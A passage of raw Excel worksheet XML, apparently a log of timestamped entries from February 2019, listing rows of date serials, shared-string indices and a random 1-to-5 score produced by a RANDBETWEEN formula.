        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2311" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2311" s="1">
        <v>43516.488298611112</v>
      </c>
      <c r="B2311" t="s">
        <v>13</v>
      </c>
      <c r="C2311" t="s">
        <v>10</v>
      </c>
      <c r="D2311" t="s">
        <v>6</v>
      </c>
      <c r="E2311" s="2" t="s">
        <v>2273</v>
      </c>
      <c r="F2311">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2312" s="1">
        <v>43516.475277777776</v>
      </c>
      <c r="B2312" t="s">
        <v>5</v>
      </c>
      <c r="C2312" t="s">
        <v>10</v>
      </c>
      <c r="D2312" t="s">
        <v>46</v>
      </c>
      <c r="E2312" t="s">
        <v>2274</v>
      </c>
      <c r="F2312">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2313" s="1">
        <v>43516.472187500003</v>
      </c>
      <c r="B2313" t="s">
        <v>13</v>
      </c>
      <c r="C2313" t="s">
        <v>6</v>
      </c>
      <c r="D2313" t="s">
        <v>25</v>
      </c>
      <c r="E2313" t="s">
        <v>2275</v>
      </c>
      <c r="F2313">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2314" s="1">
        <v>43516.460636574076</v>
      </c>
      <c r="B2314" t="s">
        <v>19</v>
      </c>
      <c r="C2314" t="s">
        <v>10</v>
      </c>
      <c r="D2314" t="s">
        <v>89</v>
      </c>
      <c r="E2314" t="s">
        <v>2276</v>
      </c>
      <c r="F2314">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2315" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A2315" s="1">
        <v>43516.460509259261</v>
      </c>
      <c r="B2315" t="s">
        <v>5</v>
      </c>
      <c r="C2315" t="s">
        <v>48</v>
      </c>
      <c r="E2315" s="2" t="s">
        <v>2277</v>
      </c>
      <c r="F2315">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2316" s="1">
        <v>43516.457557870373</v>
      </c>
      <c r="B2316" t="s">
        <v>19</v>
      </c>
      <c r="C2316" t="s">
        <v>10</v>
      </c>
      <c r="D2316" t="s">
        <v>33</v>
      </c>
      <c r="E2316" t="s">
        <v>2278</v>
      </c>
      <c r="F2316">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2317" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2317" s="1">
        <v>43516.431157407409</v>
      </c>
      <c r="B2317" t="s">
        <v>35</v>
      </c>
      <c r="C2317" t="s">
        <v>10</v>
      </c>
      <c r="D2317" t="s">
        <v>89</v>
      </c>
      <c r="E2317" s="2" t="s">
        <v>2279</v>
      </c>
      <c r="F2317">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2318" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2318" s="1">
        <v>43516.425069444442</v>
      </c>
      <c r="B2318" t="s">
        <v>19</v>
      </c>
      <c r="C2318" t="s">
        <v>10</v>
      </c>
      <c r="D2318" t="s">
        <v>336</v>
      </c>
      <c r="E2318" t="s">
        <v>2280</v>
      </c>
      <c r="F2318">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2319" s="1">
        <v>43516.42087962963</v>
      </c>
      <c r="B2319" t="s">
        <v>5</v>
      </c>
      <c r="C2319" t="s">
        <v>48</v>
      </c>
      <c r="F2319">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2320" s="1">
        <v>43516.418553240743</v>
      </c>
      <c r="B2320" t="s">
        <v>19</v>
      </c>
      <c r="C2320" t="s">
        <v>10</v>
      </c>
      <c r="D2320" t="s">
        <v>107</v>
      </c>
      <c r="E2320" t="s">
        <v>2281</v>
      </c>
      <c r="F2320">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2321" s="1">
        <v>43516.404444444444</v>
      </c>
      <c r="B2321" t="s">
        <v>19</v>
      </c>
      <c r="C2321" t="s">
        <v>60</v>
      </c>
      <c r="E2321" t="s">
        <v>2282</v>
      </c>
      <c r="F2321">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2322" s="1">
        <v>43516.400196759256</v>
      </c>
      <c r="B2322" t="s">
        <v>1305</v>
      </c>
      <c r="C2322" t="s">
        <v>48</v>
      </c>
      <c r="E2322" t="s">
        <v>2283</v>
      </c>
      <c r="F2322">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2323" s="1">
        <v>43516.389131944445</v>
      </c>
      <c r="B2323" t="s">
        <v>19</v>
      </c>
      <c r="C2323" t="s">
        <v>48</v>
      </c>
      <c r="E2323" t="s">
        <v>2284</v>
      </c>
      <c r="F2323">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2324" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2324" s="1">
        <v>43516.38113425926</v>
      </c>
      <c r="B2324" t="s">
        <v>13</v>
      </c>
      <c r="C2324" t="s">
        <v>563</v>
      </c>
      <c r="E2324" s="2" t="s">
        <v>2285</v>
      </c>
      <c r="F2324">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2325" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A2325" s="1">
        <v>43516.377476851849</v>
      </c>
      <c r="B2325" t="s">
        <v>13</v>
      </c>
      <c r="C2325" t="s">
        <v>48</v>
      </c>
      <c r="E2325" s="2" t="s">
        <v>2286</v>
      </c>
      <c r="F2325">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2326" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A2326" s="1">
        <v>43516.375937500001</v>
      </c>
      <c r="B2326" t="s">
        <v>5</v>
      </c>
      <c r="C2326" t="s">
        <v>6</v>
      </c>
      <c r="D2326" t="s">
        <v>194</v>
      </c>
      <c r="E2326" s="2" t="s">
        <v>2287</v>
      </c>
      <c r="F2326">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2327" s="1">
        <v>43516.365520833337</v>
      </c>
      <c r="B2327" t="s">
        <v>19</v>
      </c>
      <c r="C2327" t="s">
        <v>10</v>
      </c>
      <c r="D2327" t="s">
        <v>494</v>
      </c>
      <c r="E2327" t="s">
        <v>2288</v>
      </c>
      <c r="F2327">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2328" s="1">
        <v>43516.358344907407</v>
      </c>
      <c r="B2328" t="s">
        <v>19</v>
      </c>
      <c r="C2328" t="s">
        <v>10</v>
      </c>
      <c r="D2328" t="s">
        <v>86</v>
      </c>
      <c r="E2328" t="s">
        <v>2289</v>
      </c>
      <c r="F2328">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2329" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2329" s="1">
        <v>43516.348402777781</v>
      </c>
      <c r="B2329" t="s">
        <v>35</v>
      </c>
      <c r="C2329" t="s">
        <v>65</v>
      </c>
      <c r="E2329" s="2" t="s">
        <v>2290</v>
      </c>
      <c r="F2329">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2330" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2330" s="1">
        <v>43516.336400462962</v>
      </c>
      <c r="B2330" t="s">
        <v>5</v>
      </c>
      <c r="C2330" t="s">
        <v>71</v>
      </c>
      <c r="E2330" s="2" t="s">
        <v>2291</v>
      </c>
      <c r="F2330">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2331" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2331" s="1">
        <v>43516.318796296298</v>
      </c>
      <c r="B2331" t="s">
        <v>19</v>
      </c>
      <c r="C2331" t="s">
        <v>408</v>
      </c>
      <c r="E2331" s="2" t="s">
        <v>2292</v>
      </c>
      <c r="F2331">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2332" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2332" s="1">
        <v>43516.315937500003</v>
      </c>
      <c r="B2332" t="s">
        <v>19</v>
      </c>
      <c r="C2332" t="s">
        <v>408</v>
      </c>
      <c r="E2332" s="2" t="s">
        <v>2293</v>
      </c>
      <c r="F2332">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2333" s="1">
        <v>43516.288078703707</v>
      </c>
      <c r="B2333" t="s">
        <v>35</v>
      </c>
      <c r="C2333" t="s">
        <v>48</v>
      </c>
      <c r="E2333" t="s">
        <v>2294</v>
      </c>
      <c r="F2333">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2334" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A2334" s="1">
        <v>43516.263958333337</v>
      </c>
      <c r="B2334" t="s">
        <v>19</v>
      </c>
      <c r="C2334" t="s">
        <v>10</v>
      </c>
      <c r="D2334" t="s">
        <v>36</v>
      </c>
      <c r="E2334" s="2" t="s">
        <v>2295</v>
      </c>
      <c r="F2334">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2335" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A2335" s="1">
        <v>43516.247511574074</v>
      </c>
      <c r="B2335" t="s">
        <v>35</v>
      </c>
      <c r="C2335" t="s">
        <v>127</v>
      </c>
      <c r="E2335" s="2" t="s">
        <v>2296</v>
      </c>
      <c r="F2335">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2336" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2336" s="1">
        <v>43516.247106481482</v>
      </c>
      <c r="B2336" t="s">
        <v>35</v>
      </c>
      <c r="C2336" t="s">
        <v>865</v>
      </c>
      <c r="E2336" t="s">
        <v>2297</v>
      </c>
      <c r="F2336">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2337" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2337" s="1">
        <v>43516.244201388887</v>
      </c>
      <c r="B2337" t="s">
        <v>5</v>
      </c>
      <c r="C2337" t="s">
        <v>2210</v>
      </c>
      <c r="E2337" s="2" t="s">
        <v>2298</v>
      </c>
      <c r="F2337">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2338" s="1">
        <v>43516.215370370373</v>
      </c>
      <c r="B2338" t="s">
        <v>19</v>
      </c>
      <c r="C2338" t="s">
        <v>10</v>
      </c>
      <c r="D2338" t="s">
        <v>6</v>
      </c>
      <c r="E2338" t="s">
        <v>2299</v>
      </c>
      <c r="F2338">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2339" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2339" s="1">
        <v>43516.213078703702</v>
      </c>
      <c r="B2339" t="s">
        <v>13</v>
      </c>
      <c r="C2339" t="s">
        <v>48</v>
      </c>
      <c r="E2339" s="2" t="s">
        <v>2300</v>
      </c>
      <c r="F2339">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2340" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2340" s="1">
        <v>43516.209837962961</v>
      </c>
      <c r="B2340" t="s">
        <v>19</v>
      </c>
      <c r="C2340" t="s">
        <v>776</v>
      </c>
      <c r="E2340" s="2" t="s">
        <v>2301</v>
      </c>
      <c r="F2340">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2341" s="1">
        <v>43516.185648148145</v>
      </c>
      <c r="B2341" t="s">
        <v>19</v>
      </c>
      <c r="C2341" t="s">
        <v>118</v>
      </c>
      <c r="E2341" t="s">
        <v>2302</v>
      </c>
      <c r="F2341">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2342" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2342" s="1">
        <v>43516.181793981479</v>
      </c>
      <c r="B2342" t="s">
        <v>19</v>
      </c>
      <c r="C2342" t="s">
        <v>71</v>
      </c>
      <c r="F2342">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2343" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2343" s="1">
        <v>43516.175358796296</v>
      </c>
      <c r="B2343" t="s">
        <v>19</v>
      </c>
      <c r="C2343" t="s">
        <v>43</v>
      </c>
      <c r="E2343" s="2" t="s">
        <v>2303</v>
      </c>
      <c r="F2343">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2344" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2344" s="1">
        <v>43516.15184027778</v>
      </c>
      <c r="B2344" t="s">
        <v>19</v>
      </c>
      <c r="C2344" t="s">
        <v>71</v>
      </c>
      <c r="E2344" s="2" t="s">
        <v>2304</v>
      </c>
      <c r="F2344">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2345" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2345" s="1">
        <v>43516.149594907409</v>
      </c>
      <c r="B2345" t="s">
        <v>13</v>
      </c>
      <c r="C2345" t="s">
        <v>103</v>
      </c>
      <c r="E2345" s="2" t="s">
        <v>2305</v>
      </c>
      <c r="F2345">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2346" s="1">
        <v>43516.132777777777</v>
      </c>
      <c r="B2346" t="s">
        <v>5</v>
      </c>
      <c r="C2346" t="s">
        <v>48</v>
      </c>
      <c r="E2346" t="s">
        <v>2306</v>
      </c>
      <c r="F2346">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2347" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A2347" s="1">
        <v>43516.111192129632</v>
      </c>
      <c r="B2347" t="s">
        <v>19</v>
      </c>
      <c r="C2347" t="s">
        <v>71</v>
      </c>
      <c r="E2347" s="2" t="s">
        <v>2307</v>
      </c>
      <c r="F2347">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2348" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2348" s="1">
        <v>43516.085185185184</v>
      </c>
      <c r="B2348" t="s">
        <v>19</v>
      </c>
      <c r="C2348" t="s">
        <v>139</v>
      </c>
      <c r="E2348" s="2" t="s">
        <v>2308</v>
      </c>
      <c r="F2348">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2349" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2349" s="1">
        <v>43516.056550925925</v>
      </c>
      <c r="B2349" t="s">
        <v>19</v>
      </c>
      <c r="C2349" t="s">
        <v>41</v>
      </c>
      <c r="E2349" s="2" t="s">
        <v>2309</v>
      </c>
      <c r="F2349">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2350" s="1">
        <v>43516.042800925927</v>
      </c>
      <c r="B2350" t="s">
        <v>19</v>
      </c>
      <c r="C2350" t="s">
        <v>73</v>
      </c>
      <c r="E2350" t="s">
        <v>2310</v>
      </c>
      <c r="F2350">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2351" s="1">
        <v>43516.002523148149</v>
      </c>
      <c r="B2351" t="s">
        <v>5</v>
      </c>
      <c r="C2351" t="s">
        <v>41</v>
      </c>
      <c r="F2351">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2352" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2352" s="1">
        <v>43515.998726851853</v>
      </c>
      <c r="B2352" t="s">
        <v>13</v>
      </c>
      <c r="C2352" t="s">
        <v>139</v>
      </c>
      <c r="D2352" t="s">
        <v>312</v>
      </c>
      <c r="E2352" t="s">
        <v>2312</v>
      </c>
      <c r="F2352">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2353" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2353" s="1">
        <v>43515.986354166664</v>
      </c>
      <c r="B2353" t="s">
        <v>19</v>
      </c>
      <c r="C2353" t="s">
        <v>10</v>
      </c>
      <c r="D2353" t="s">
        <v>89</v>
      </c>
      <c r="E2353" s="2" t="s">
        <v>2313</v>
      </c>
      <c r="F2353">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2354" s="1">
        <v>43515.909074074072</v>
      </c>
      <c r="B2354" t="s">
        <v>5</v>
      </c>
      <c r="C2354" t="s">
        <v>6</v>
      </c>
      <c r="D2354" t="s">
        <v>25</v>
      </c>
      <c r="F2354">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2355" s="1">
        <v>43515.874745370369</v>
      </c>
      <c r="B2355" t="s">
        <v>19</v>
      </c>
      <c r="C2355" t="s">
        <v>10</v>
      </c>
      <c r="D2355" t="s">
        <v>86</v>
      </c>
      <c r="E2355" t="s">
        <v>2314</v>
      </c>
      <c r="F2355">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2356" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2356" s="1">
        <v>43515.853726851848</v>
      </c>
      <c r="B2356" t="s">
        <v>19</v>
      </c>
      <c r="C2356" t="s">
        <v>10</v>
      </c>
      <c r="D2356" t="s">
        <v>480</v>
      </c>
      <c r="E2356" s="2" t="s">
        <v>2315</v>
      </c>
      <c r="F2356">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2357" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2357" s="1">
        <v>43515.765949074077</v>
      </c>
      <c r="B2357" t="s">
        <v>5</v>
      </c>
      <c r="C2357" t="s">
        <v>10</v>
      </c>
      <c r="D2357" t="s">
        <v>336</v>
      </c>
      <c r="E2357" s="2" t="s">
        <v>2316</v>
      </c>
      <c r="F2357">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2358" s="1">
        <v>43515.753923611112</v>
      </c>
      <c r="B2358" t="s">
        <v>35</v>
      </c>
      <c r="C2358" t="s">
        <v>10</v>
      </c>
      <c r="D2358" t="s">
        <v>36</v>
      </c>
      <c r="E2358" t="s">
        <v>2317</v>
      </c>
      <c r="F2358">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2359" s="1">
        <v>43515.72755787037</v>
      </c>
      <c r="B2359" t="s">
        <v>13</v>
      </c>
      <c r="C2359" t="s">
        <v>10</v>
      </c>
      <c r="D2359" t="s">
        <v>6</v>
      </c>
      <c r="E2359" t="s">
        <v>2318</v>
      </c>
      <c r="F2359">
        <f t="shared" ca="1" si="36"/>
        <v>4</v>
      </c>
    </row>
    <row r="2360" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A2360" s="1">
        <v>43515.724050925928</v>
      </c>
      <c r="B2360" t="s">
        <v>1305</v>
      </c>
      <c r="C2360" t="s">
        <v>10</v>
      </c>
      <c r="D2360" t="s">
        <v>6</v>
      </c>
      <c r="E2360" s="2" t="s">
        <v>2319</v>
      </c>
      <c r="F2360">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2361" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2361" s="1">
        <v>43515.684120370373</v>
      </c>
      <c r="B2361" t="s">
        <v>1305</v>
      </c>
      <c r="C2361" t="s">
        <v>10</v>
      </c>
      <c r="D2361" t="s">
        <v>14</v>
      </c>
      <c r="E2361" t="s">
        <v>2320</v>
      </c>
      <c r="F2361">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2362" s="1">
        <v>43515.638229166667</v>
      </c>
      <c r="B2362" t="s">
        <v>13</v>
      </c>
      <c r="C2362" t="s">
        <v>16</v>
      </c>
      <c r="E2362" t="s">
        <v>2321</v>
      </c>
      <c r="F2362">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2363" s="1">
        <v>43515.624432870369</v>
      </c>
      <c r="B2363" t="s">
        <v>13</v>
      </c>
      <c r="C2363" t="s">
        <v>10</v>
      </c>
      <c r="D2363" t="s">
        <v>89</v>
      </c>
      <c r="E2363" t="s">
        <v>2322</v>
      </c>
      <c r="F2363">
        <f t="shared" ca="1" si="36"/>
        <v>1</v>
      </c>
    </row>
    <row r="2364" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2364" s="1">
        <v>43515.622187499997</v>
      </c>
      <c r="B2364" t="s">
        <v>1305</v>
      </c>
      <c r="C2364" t="s">
        <v>6</v>
      </c>
      <c r="D2364" t="s">
        <v>25</v>
      </c>
      <c r="E2364" t="s">
        <v>2323</v>
      </c>
      <c r="F2364">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2365" s="1">
        <v>43515.605104166665</v>
      </c>
      <c r="B2365" t="s">
        <v>13</v>
      </c>
      <c r="C2365" t="s">
        <v>260</v>
      </c>
      <c r="E2365" t="s">
        <v>2324</v>
      </c>
      <c r="F2365">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2366" s="1">
        <v>43515.603090277778</v>
      </c>
      <c r="B2366" t="s">
        <v>19</v>
      </c>
      <c r="C2366" t="s">
        <v>10</v>
      </c>
      <c r="D2366" t="s">
        <v>80</v>
      </c>
      <c r="E2366" t="s">
        <v>2325</v>
      </c>
      <c r="F2366">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2367" s="1">
        <v>43515.600787037038</v>
      </c>
      <c r="B2367" t="s">
        <v>1305</v>
      </c>
      <c r="C2367" t="s">
        <v>6</v>
      </c>
      <c r="D2367" t="s">
        <v>114</v>
      </c>
      <c r="E2367" t="s">
        <v>2326</v>
      </c>
      <c r="F2367">
        <f t="shared" ca="1" si="36"/>
        <v>3</v>
      </c>
    </row>
    <row r="2368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2368" s="1">
        <v>43515.581562500003</v>
      </c>
      <c r="B2368" t="s">
        <v>13</v>
      </c>
      <c r="C2368" t="s">
        <v>10</v>
      </c>
      <c r="D2368" t="s">
        <v>46</v>
      </c>
      <c r="E2368" t="s">
        <v>2327</v>
      </c>
      <c r="F2368">
        <f t="shared" ca="1" si="36"/>
        <v>2</v>
      </c>
    </row>
    <row r="2369" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2369" s="1">
        <v>43515.564965277779</v>
      </c>
      <c r="B2369" t="s">
        <v>19</v>
      </c>
      <c r="C2369" t="s">
        <v>10</v>
      </c>
      <c r="D2369" t="s">
        <v>6</v>
      </c>
      <c r="E2369" s="2" t="s">
        <v>2328</v>
      </c>
      <c r="F2369">
        <f t="shared" ca="1" si="36"/>
        <v>5</v>
      </c>
    </row>
    <row r="2370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2370" s="1">
        <v>43515.564386574071</v>
      </c>
      <c r="B2370" t="s">
        <v>13</v>
      </c>
      <c r="C2370" t="s">
        <v>10</v>
      </c>
      <c r="D2370" t="s">
        <v>251</v>
      </c>
      <c r="E2370" t="s">
        <v>2329</v>
      </c>
      <c r="F2370">
        <f t="shared" ref="F2370:F2433" ca="1" si="37">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2371" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2371" s="1">
        <v>43515.557754629626</v>
      </c>
      <c r="B2371" t="s">
        <v>19</v>
      </c>
      <c r="C2371" t="s">
        <v>10</v>
      </c>
      <c r="D2371" t="s">
        <v>107</v>
      </c>
      <c r="E2371" s="2" t="s">
        <v>2330</v>
      </c>
      <c r="F2371">
        <f t="shared" ca="1" si="37"/>
        <v>4</v>
      </c>
    </row>
    <row r="2372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2372" s="1">
        <v>43515.536354166667</v>
      </c>
      <c r="B2372" t="s">
        <v>19</v>
      </c>
      <c r="C2372" t="s">
        <v>10</v>
      </c>
      <c r="D2372" t="s">
        <v>89</v>
      </c>
      <c r="E2372" t="s">
        <v>2331</v>
      </c>
      <c r="F2372">
        <f t="shared" ca="1" si="37"/>
        <v>1</v>
      </c>
    </row>
    <row r="2373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2373" s="1">
        <v>43515.530787037038</v>
      </c>
      <c r="B2373" t="s">
        <v>5</v>
      </c>
      <c r="C2373" t="s">
        <v>10</v>
      </c>
      <c r="D2373" t="s">
        <v>89</v>
      </c>
      <c r="E2373" t="s">
        <v>2332</v>
      </c>
      <c r="F2373">
        <f t="shared" ca="1" si="37"/>
        <v>5</v>
      </c>
    </row>
    <row r="2374" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2374" s="1">
        <v>43515.516574074078</v>
      </c>
      <c r="B2374" t="s">
        <v>5</v>
      </c>
      <c r="C2374" t="s">
        <v>41</v>
      </c>
      <c r="E2374" s="2" t="s">
        <v>2333</v>
      </c>
      <c r="F2374">
        <f t="shared" ca="1" si="37"/>
        <v>3</v>
      </c>
    </row>
    <row r="2375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2375" s="1">
        <v>43515.512384259258</v>
      </c>
      <c r="B2375" t="s">
        <v>5</v>
      </c>
      <c r="C2375" t="s">
        <v>6</v>
      </c>
      <c r="D2375" t="s">
        <v>25</v>
      </c>
      <c r="E2375" t="s">
        <v>2334</v>
      </c>
      <c r="F2375">
        <f t="shared" ca="1" si="37"/>
        <v>4</v>
      </c>
    </row>
    <row r="2376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2376" s="1">
        <v>43515.479421296295</v>
      </c>
      <c r="B2376" t="s">
        <v>19</v>
      </c>
      <c r="C2376" t="s">
        <v>10</v>
      </c>
      <c r="D2376" t="s">
        <v>271</v>
      </c>
      <c r="E2376" t="s">
        <v>2335</v>
      </c>
      <c r="F2376">
        <f t="shared" ca="1" si="37"/>
        <v>2</v>
      </c>
    </row>
    <row r="2377" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2377" s="1">
        <v>43515.474097222221</v>
      </c>
      <c r="B2377" t="s">
        <v>13</v>
      </c>
      <c r="C2377" t="s">
        <v>65</v>
      </c>
      <c r="E2377" s="2" t="s">
        <v>2336</v>
      </c>
      <c r="F2377">
        <f t="shared" ca="1" si="37"/>
        <v>1</v>
      </c>
    </row>
    <row r="2378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2378" s="1">
        <v>43515.459120370368</v>
      </c>
      <c r="B2378" t="s">
        <v>13</v>
      </c>
      <c r="C2378" t="s">
        <v>686</v>
      </c>
      <c r="E2378" t="s">
        <v>2337</v>
      </c>
      <c r="F2378">
        <f t="shared" ca="1" si="37"/>
        <v>3</v>
      </c>
    </row>
    <row r="2379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2379" s="1">
        <v>43515.453090277777</v>
      </c>
      <c r="B2379" t="s">
        <v>5</v>
      </c>
      <c r="C2379" t="s">
        <v>6</v>
      </c>
      <c r="D2379" t="s">
        <v>25</v>
      </c>
      <c r="E2379" t="s">
        <v>2338</v>
      </c>
      <c r="F2379">
        <f t="shared" ca="1" si="37"/>
        <v>2</v>
      </c>
    </row>
    <row r="2380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2380" s="1">
